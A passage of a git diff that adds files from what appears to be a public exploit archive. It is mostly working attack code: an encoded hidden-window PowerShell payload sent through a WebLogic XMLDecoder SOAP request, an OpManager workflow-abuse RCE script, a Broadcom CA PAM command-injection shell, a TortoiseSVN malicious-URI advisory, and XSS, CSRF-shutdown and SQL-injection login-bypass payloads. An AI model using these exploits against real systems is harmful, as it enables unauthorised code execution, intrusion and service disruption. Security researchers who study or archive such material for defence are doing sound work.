RAFgAcABkAHgAVQBWAFoARwBOAEIASABRAE8AeQBTAHEAdwBLAEQALwBkAHYAaQBMAHAAaQBIAGQAYQBDAFEAawBUADQATgBXAFYATQBiAFUAMwBBAGoASgA2AE4ASwBXAGUAcQAyADEASgBHAFMATwB5AGcANgBEAFIARQBEADgANwBZAFIASABKAGsANwBKACsALwBxACsAUQAyAGgAdgBqAFMAdgBhAFEAUABCAE0AcgBKAGoAWgBuAHYAbABBAGEAKwBpAEoAMQBpAHcAYgB2AGsATgA2AGEAdgBIAG0AbQBmACsAcAB0ACsAZwBhAFMAWABNADkARAA1AEMAVgBXAG4AYgBYAGEAUQA2ADYAMwBmAHEAcQA1ADQANwBxAHcAbQAxAFoANABwAE4AagBDAGIAcwAxAFgAaQB4AGMAMQBMADAAZQBUAHMAUwBkAGgAYgBvADMAdABQAG8AdwBxAFcAKwBYAFAAYgBwADEAKwA4AGkAZgByAEkAMwAzAFcAMwBQADcAVgBEAFgAWAAyADAAWABvAEIANQBOAG0ARQBJAFIAbgBnAFgAdABkAGUAOQBlAG0ALwBkAHYARwB3AEsAeQBlADQASAA2AHoAbABmAFYAdgB6AFMAZQB6AFcAawA5AGIAOQBLAGsANwBvAE0AUABCAFEANgA4AHQANwBpAGMAagBoAG8AZQBCAEUAWQA1AHIANQA1AGkAdQArADgAbABpAFYATwBQADIAMQBrAEsAbwBNAHoALwAxAHQAcgAxAGcAMQBKAG4AYgAvAG0AYgBTAHAAVwBSAGgAVgBQAHQAMABnAEEAWQBJAGYAZgBLAHUAaAA4AE4ATwB1AEEAdwA3AEsAVABMAE8AUgA0ACsATgBLAEcAeQBPAEgAVwBlAEIAawBZAFYAYQBvADAAMwB2AEgAVABNAEgAdwA3AGEASgBoAGkAMQB6AGcASwArADQAYwAzAHIAVQBOAEcAcAAzAC8AbQBPAHIAZgBUAGYARwB2AFkAagA1AG4AYQA1AFIAbQA0AHkAUgBqAHgATABqAEoAcAB6AFgAegBxADcAbQBzAGMAUQBKAGgAKwBhAGoASwBXAFYAUQAvADIANwBUAE4AawBEAEcAcQBhAE4AdQAvAFkAUgB1ADcAeAA0AEgAbgBSAEMAMQBRAEcAWQBVAGMAWQBUAGIAOQBHAEYANABOAEEAYQBiAGwAegBlAGcAYwB6AHUAcwArAFIAeQBKADIAQgBvAGIAeABpAGcAMABRAGgAUwA0ADgAdwBsAEcASgBrAGkAYgBqADYAaAB0ADgAcwBiAG0AZwAyAE0ANwB4AG0AaAAwAE0AcQAvAGQAUAA5AFQAbQA0AEQATQBaAHIAegA3AFkAUABYAFQAVQA5AGgAegBEAE0ASQA2AGkAZQAvAGcAMQBrAEcAYwB2ADEALwBIAFkAZgBEAHAAYgBQAFEAbgBjAHUAdwBYAGIATgA4AGIANQA4AE8ATgBiAHkAUgBFAGcAUwBTAGsAeQBhADgAMABYAHUAZgA5AFIAeQA3AFoAeABrAHMANAB4AEEAMAA1AEEATQB5ADcASwBzAE0AMgBUAGQAdAA1AGUASABVADYAbABoAHEAYgBKAEsALwBtAEIASgBEAEYAaABjAEsAUABCAG4AVgBlAFEARwBUAEgARwBQAGQAbgBjAG8AUQAvAEQAdABiAEoAdgA5AHYATAB1AEcAYwBMAHcAOQBPAFQAVgBrAGEANAA4AEMAKwBwAGYAZQAzADYAeABkAEgARgB4AEIAeQA1AEMAZABlAHoANABXACsAbQBUAE8AQgBUAHoAYwBuAFYAOQBXAHEAMQBDAEQANgArAHUANgAxAFcASQA4AGQAZgBqAGEAdgBEAGwAUgB0AHYAYgBLAHMAdABMAFkASQBmAE0AcwAzAFcAMgBzADYANwBMAHUAaQBrAHQAKwA2AFAALwBGAGIARwA4AFYAdQBmAHcANQAvADgAYwBzAGEAOQByAFAAOQBuADkASgBSAFMAcgA1AFgAMgA4ADMAeQAxAC8AdQAvAEIAYgBpAFAANQB1ADMATABlAFkAQwBoAEIAMABvAGQARQB3AHMAcgAvAG4AWABnAHMALwA1ADgAYQBMAGwAdwBCAEkAQwBPAFEAOQB5AEIALwA1AEMAbgBlAFYAaQBlAE4ATABlAEQAVgA0AGMALwBnAFAAeQBrAHYAWgBDAGkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA=="
+
+url =  sys.argv[1]
+
+request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Content-Type": "text/xml"}
+data="<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\r\n    <soapenv:Header>\r\n        <wsa:Action>xx</wsa:Action>\r\n        <wsa:RelatesTo>xx</wsa:RelatesTo>\r\n        <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n            <void class=\"java.lang.ProcessBuilder\">\r\n                <array class=\"java.lang.String\" length=\"3\">\r\n                    <void index=\"0\">\r\n                        <string>cmd</string>\r\n                    </void>\r\n                    <void index=\"1\">\r\n                        <string>/c</string>\r\n                    </void>\r\n                    <void index=\"2\">\r\n                        <string>%s</string>\r\n                    </void>\r\n                </array>\r\n            <void method=\"start\"/></void>\r\n        </work:WorkContext>\r\n    </soapenv:Header>\r\n    <soapenv:Body>\r\n    <asy:onAsyncDelivery/>\r\n    </soapenv:Body>\r\n</soapenv:Envelope>" %  (exploit)
+response = requests.post(url, headers=request_headers, data=data)
+print "status_code:%s" % str(response.status_code)
+print(response)
\ No newline at end of file
diff --git a/exploits/windows/webapps/47252.txt b/exploits/windows/webapps/47252.txt
new file mode 100644
index 000000000..b1030dde2
--- /dev/null
+++ b/exploits/windows/webapps/47252.txt
@@ -0,0 +1,194 @@
+Document Title:
+===============
+TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2188
+
+Product:
+https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/
+
+Ticket: https://groups.google.com/forum/#!forum/tortoisesvn
+
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422
+
+CVE-ID:
+=======
+CVE-2019-14422
+
+
+Release Date:
+=============
+2019-08-13
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2188
+
+
+Common Vulnerability Scoring System:
+====================================
+8.8
+
+
+Vulnerability Class:
+====================
+Code Execution
+
+
+Current Estimated Price:
+========================
+4.000€ - 5.000€
+
+
+Product & Service Introduction:
+===============================
+TortoiseSVN is a really easy to use Revision control / version control /
+source control software for Windows.
+It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and
+easy user interface for Subversion.
+It is developed under the GPL. Which means it is completely free for
+anyone to use, including in a commercial
+environment, without any restriction. The source code is also freely
+available, so you can even develop your
+own version if you wish to. Since it's not an integration for a specific
+IDE like Visual Studio, Eclipse or
+others, you can use it with whatever development tools you like, and
+with any type of file.
+
+(Copy of the about page: https://tortoisesvn.net/about.html )
+
+
+Abstract Advisory Information:
+==============================
+A vulnerability laboratory researcher (vxrl team) discovered a remote
+code execution vulnerability in the TortoiseSVN v1.12.1 software.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2019-08-13: Public Disclosure (Vulnerability Laboratory)
+
+Affected Product(s):
+====================
+TortoiseSVN
+Product: TortoiseSVN - Software 1.12.1
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre auth - no privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A remote code execution vulnerability has been uncovered in the official
+TortoiseSVN v1.12.1 software.
+The vulnerability typ allows remote attackers to execute arbitrary codes
+to compromise a target computer system.
+
+The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff
+operation on Excel workbooks, which could be used to open remote
+workbooks without protection from macro security settings to execute
+arbitrary code.
+
+The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a
+customised diff on [file1] and [file2] based on the file extension.
+For xls files, it will execute the script `diff-xls.js` using wscript,
+which will open the two files for analysis without any macro
+security warning. An attacker can exploit this by putting a macro virus
+in a network drive, and force the victim to open the workbooks
+and execute the macro inside. Since the macro is triggered through
+wscript, to make the attack less visible, one could kill the wscript
+process and quit the excel program after the code was executed.
+
+
+Proof of Concept (PoC):
+=======================
+The vulnerability could be triggered by visiting a specially crafted URL
+via web browser.
+To reproduce the vulnerability, one could simply create a .url file or
+open the URL with a browsers,
+but a notification prompt may be shown for the latter case.
+
+<a
+href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'>Checkout
+the Repo with TortoiseSVN</a>
+
+where VBoxSvrv is the remote network drive controlled by the attacker,
+v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.
+
+Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar
+Password: 23vxrl23
+
+PoC: Video
+https://www.youtube.com/watch?v=spvRSC377vI
+
+
+Security Risk:
+==============
+The security risk of the remote code execution vulnerability in the
+software component is estimated as high.
+
+
+Credits & Authors:
+==================
+PingFanZettaKe [VXRL Team] -
+https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
\ No newline at end of file
diff --git a/exploits/windows/webapps/47255.py b/exploits/windows/webapps/47255.py
new file mode 100755
index 000000000..3615a7ba5
--- /dev/null
+++ b/exploits/windows/webapps/47255.py
@@ -0,0 +1,266 @@
+#!/usr/bin/env python3
+
+# Exploit Title: ManageEngine opManager Authenticated Code Execution
+# Google Dork: N/A
+# Date: 08/13/2019
+# Exploit Author: @kindredsec
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/network-monitoring/download.html
+# Version: 12.3.150
+# Tested on: Windows Server 2016
+# CVE: N/A
+
+import requests
+import re
+import random
+import sys
+import json
+import string
+import argparse
+
+C_WHITE = '\033[1;37m'
+C_BLUE = '\033[1;34m'
+C_GREEN = '\033[1;32m'
+C_YELLOW = '\033[1;33m'
+C_RED = '\033[1;31m'
+C_RESET = '\033[0m'
+LOGIN_FAIL_MSG = "Invalid username and/or password."
+
+def buildRandomString(length=10):
+	letters = string.ascii_lowercase
+	return ''.join(random.choice(letters) for i in range(length))
+
+
+def getSessionData(target, user, password):
+
+	session = requests.Session()
+	session.get(target)
+
+	# Login Sequence
+	randSid = random.uniform(-1,1)
+	getParams = { "requestType" : "AJAX" , "sid" : str(randSid) }
+	postData = { "eraseAutoLoginCookie" : "true" }
+	session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams )
+
+	postData = { "loginFromCookieData" : "false",
+						 "ntlmv2" : "false", 
+						 "j_username" : user,
+						 "j_password" : password 
+						}
+	initialAuth = session.post( url = target + "/j_security_check", data = postData ) 
+
+
+	if LOGIN_FAIL_MSG in initialAuth.text:
+
+		print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.")
+		sys.exit(1)
+
+	elif initialAuth.status_code != 200:
+		print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.")
+		sys.exit(1)
+
+	apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text)
+	apiKey = apiKeyReg.group(0).split('"')[1]
+
+	return { "session" : session , "apiKey" : apiKey }
+
+
+
+
+def getDeviceList(target, session, apiKey):
+
+	deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } )
+
+	devices = {}
+	devicesJsonParsed = json.loads(deviceList.text)
+	for row in devicesJsonParsed["rows"]:
+		devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ]
+
+	return devices
+
+
+
+def buildTaskWindows(target, session, apiKey, device, command):
+
+	# Build Task
+	taskName = buildRandomString()
+	workFlowName = buildRandomString(15)
+
+	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
+	jsonData += '"' + taskName + '"'
+	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":""" 
+	jsonData += '"' + command + '"'
+	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
+	jsonData += '"' + workFlowName + '"' 
+	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
+	jsonData += '"' +  device + '"' 
+	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
+	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
+	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""
+
+	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })
+
+	if "has been created successfully" in makeWorkFlow.text:
+		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
+	else:
+		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
+		sys.exit(1)
+
+	return workFlowName
+
+
+def buildTaskLinux(target, session, apiKey, device, command):
+
+	taskName = buildRandomString()
+	workFlowName = buildRandomString(15)
+
+	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
+	jsonData += '"' + taskName + '"'
+	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":""" 
+	jsonData += '"' + command + '"'
+	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
+	jsonData += '"' + workFlowName + '"' 
+	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
+	jsonData += '"' +  device + '"' 
+	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
+	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
+	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""
+
+	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })
+
+	if "has been created successfully" in makeWorkFlow.text:
+		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
+	else:
+		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
+		sys.exit(1)
+
+	return workFlowName
+
+
+# Get the ID of the newly created workflow
+def getWorkflowID(target, session, apiKey, workflowName):
+
+	getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey })
+
+	rbID = -100
+	workflowJsonParsed = json.loads(getID.text)
+	for wf in workflowJsonParsed:
+		if wf['name'] == workflowName:
+			rbID = wf['rbID'] 
+
+	if rbID == -100: 
+		print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...")
+		sys.exit(1)
+
+	return rbID
+
+
+def getDeviceID(target, session, apiKey, rbID, device):
+
+	getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID })
+	wfDevicesJsonParsed = json.loads(getDevices.text)
+	wfDevices = wfDevicesJsonParsed["defaultDevices"]
+	deviceID = list(wfDevices.keys())[0]
+
+	return deviceID
+
+
+
+def runWorkflow(target, session, apiKey, rbID, device):
+
+	targetDeviceID = getDeviceID(target, session, apiKey, rbID, device)
+	
+	print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .")
+	workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 }	)
+
+	if re.match(r"^\[.*\]$", workflowExec.text.strip()):
+		print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!")
+	else:
+		print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.")
+		sys.exit(1)
+
+	deleteWorkflow(target, session, apiKey, rbID)
+	print(f"{C_GREEN}[+]{C_RESET} Exploit complete!")
+
+
+def deleteWorkflow(target, session, apiKey, rbID):
+	
+	print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .")
+	delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID })
+
+
+def main():
+
+	parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.")
+	parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)")
+	parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.")
+	parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.")
+	parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.")
+
+	args = parser.parse_args()
+	
+	insufficient_args = False
+	if not args.u:
+		print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.")
+		insufficient_args = True
+	if not args.t:
+		print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.")
+		insufficient_args = True
+	if not args.p:
+		print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.")
+		insufficient_args = True
+	if not args.c:
+		print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.")
+		insufficient_args = True
+
+	if insufficient_args:
+		sys.exit(1)
+
+	
+	sessionDat = getSessionData(args.t, args.u, args.p)
+	session = sessionDat["session"]
+	apiKey = sessionDat["apiKey"]
+
+	devices = getDeviceList(args.t, session, apiKey)
+
+	# if there's only one device in the OpManager instance, default to running commands on that device;
+	# no need to ask the user.
+	if len(devices.keys()) == 1:
+		device = list(devices.keys())[0]
+	else:
+		print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:")
+		print("")
+		counter = 1
+		for key in devices.keys():
+			print(f"   {counter}: {key} ({devices[key][0]}) ({devices[key][1]})")
+
+		print("")
+		while True:
+			try:
+				prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: "
+				devSelect = int(input(prompt))
+			except KeyboardInterrupt:
+				sys.exit(1)
+			except ValueError:
+				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
+				sys.exit(1)
+	
+			if devSelect < 1 or devSelect > len(list(devices.keys())):
+				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
+				sys.exit(1)
+
+			else:
+				device = list(devices.keys())[counter - 1]
+				break
+
+	# don't hate, it works doesn't it?
+	if "indows" in devices[device][1]:
+		workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c)
+	else:
+		workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c)
+
+	workflowID =  getWorkflowID(args.t, session, apiKey, workflowName)
+	runWorkflow(args.t, session, apiKey, workflowID, device)
+	
+	
+main()
\ No newline at end of file
diff --git a/exploits/windows/webapps/47302.txt b/exploits/windows/webapps/47302.txt
new file mode 100644
index 000000000..a5ed01e71
--- /dev/null
+++ b/exploits/windows/webapps/47302.txt
@@ -0,0 +1,23 @@
+# Exploit Title: LSoft ListServ < 16.5 - Cross-Site Scripting (XSS)
+# Google Dork: intitle:LISTSERV 16.5
+# Date: 08-21-2019
+# Exploit Author: MTK (http://mtk911.cf/)
+# Vendor Homepage: http://www.lsoft.com/
+# Softwae Link: http://www.lsoft.com/products/listserv.asp
+# Version: Older than Ver 16.5-2018a
+# Tested on: IIS 8.5/10.0 - Firefox/Windows
+# CVE : CVE-2019-15501
+
+# Software description:
+The term Listserv has been used to refer to electronic mailing list software applications in general, 
+but is more properly applied to a few early instances of such software, which allows a sender to send one 
+email to the list, and then transparently sends it on to the addresses of the subscribers to the list. 
+
+# POC
+
+1. 	http://127.0.0.1/scripts/wa.exe?OK=<PAYLOAD>
+2.	http://127.0.0.1/scripts/wa.exe?OK=<svg/onload=%26%23097lert%26lpar;'MTK')>
+
+# References:
+1.	http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
+2.	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
\ No newline at end of file
diff --git a/exploits/windows/webapps/47748.py b/exploits/windows/webapps/47748.py
new file mode 100755
index 000000000..ed8ed30af
--- /dev/null
+++ b/exploits/windows/webapps/47748.py
@@ -0,0 +1,71 @@
+# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
+# Author: Peter Lapp
+# Date: 2019-12-05
+# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
+# CVE: CVE-2018-9021 and CVE-2018-9022
+# Tested on: v2.8.2
+
+import urllib2
+import urllib
+import ssl
+import sys
+import json
+import base64
+
+
+ctx = ssl.create_default_context()
+ctx.check_hostname = False
+ctx.verify_mode = ssl.CERT_NONE
+
+
+def send_command(ip, cmd):
+    cmd = urllib.quote_plus(cmd)
+    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
+    request = urllib2.Request(url, None)
+    response = urllib2.urlopen(request, context=ctx)
+    result = json.load(response)
+    return result['responseData']
+
+def get_db_value():
+    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
+    db_value = send_command(ip,cmd)
+    db_value = db_value.split('\n')[1]
+    return db_value
+    
+def encode_payload(cmd):
+    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
+    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
+    return cmd
+    
+def restore_sql(value):
+    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
+    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
+    send_command(ip,cmd)
+    
+def main():
+    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
+	
+    if len(sys.argv) != 2:
+        print "Usage: xceedium_rce.py <target ip>"
+        sys.exit()
+
+    global ip
+    ip = sys.argv[1]
+    print 'Enter commands below. Type exit to quit'
+	
+    while True:
+        cmd = raw_input('# ')
+        if cmd == "exit":
+            sys.exit()
+        orig_value = get_db_value()
+        payload = encode_payload(cmd)
+        send_command(ip, payload)
+        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
+        output = send_command(ip, 'cat /tmp/output')
+        print output
+        restore_sql(orig_value)
+	
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/windows/webapps/47785.txt b/exploits/windows/webapps/47785.txt
new file mode 100644
index 000000000..160ee4815
--- /dev/null
+++ b/exploits/windows/webapps/47785.txt
@@ -0,0 +1,70 @@
+# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
+# Date: 2018-12-17 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://tautulli.com/
+# Software : https://github.com/Tautulli/Tautulli
+# Product Version: v2.1.9
+# Platform: Windows 10 (10.0.18362)
+# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
+# Vulernability Type : Cross-Site Request Forgery (ShutDown)
+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
+# been discovered that anonymous access can be achieved in applications that do
+# not have a user login area and that the remote media server can be shut down.
+
+# PoC Python Script :
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import requests
+
+icon = """
+ _____ __  _  _ _____ _  _ _   _   _   _   _ ___   __  ___
+|_   _/  \| || |_   _| || | | | | | | | \ / (_  | /  |/ _ \
+  | || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
+  |_||_||_|\__/  |_|  \__/|___|___|_|   \_/ |___\/ |_\//_/
+     Unauthenticated Remote Code Execution
+                                   by Ismail Tasdelen
+"""
+
+print(icon)
+
+host = input("[+] HOST: ")
+port = input("[+] PORT: ")
+
+response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands.
+
+if response.status_code == 200:
+    print('[✓] Success!')
+elif response.status_code != 200:
+    print('[✗] Unsuccessful!')
+else:
+    exit()
+
+# HTTP GET Request :
+
+GET /shutdown HTTP/1.1
+Host: XXX.XXX.XXX.XXX:8181
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://XXX.XXX.XXX.XXX:8181/home
+Upgrade-Insecure-Requests: 1
+
+# CSRF PoC HTML :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/windows/webapps/47811.txt b/exploits/windows/webapps/47811.txt
new file mode 100644
index 000000000..9be485763
--- /dev/null
+++ b/exploits/windows/webapps/47811.txt
@@ -0,0 +1,31 @@
+# Exploit Title: elearning-script 1.0 - Authentication Bypass
+# Author: riamloo
+# Date: 2019-12-29
+# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
+# Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# Discription:
+# E Learning Blog Developed In Raw PHP
+# Vulnerability:  Attacker can bypass login page and access to dashboard page
+# vulnerable file : /login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/elearning-script-master/login.php
+
+POST /elearning-script-master/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+Content-Length: 445
+Referer: http://localhost/elearning-script-master/login.php
+Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+'=''or'
\ No newline at end of file
diff --git a/exploits/windows/webapps/47971.txt b/exploits/windows/webapps/47971.txt
new file mode 100644
index 000000000..801e56072
--- /dev/null
+++ b/exploits/windows/webapps/47971.txt
